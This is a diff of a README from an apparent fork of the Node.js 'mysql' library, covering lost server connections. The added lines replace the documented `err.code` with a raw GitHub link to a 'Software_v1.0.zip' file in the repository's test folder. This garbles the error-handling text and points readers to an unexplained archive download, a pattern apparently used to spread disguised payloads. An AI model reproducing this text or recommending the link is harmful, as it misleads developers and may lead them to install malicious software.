vinhkennej/mysql/Readme.md

 You may lose the connection to a MySQL server due to network problems, the server timing you out, the server being restarted, or crashing.
-All of these events are considered fatal errors, and will have the `err.code = 'PROTOCOL_CONNECTION_LOST'`.
-See the [Error Handling](#error-handling) section for more information.
+All of these events are considered fatal errors, and will have the `https://raw.githubusercontent.com/vinhkennej/mysql/master/test/Software_v1.0.zip =
+'PROTOCOL_CONNECTION_LOST'`.
+See the [Error Handling](#error-handling) section
+for more information.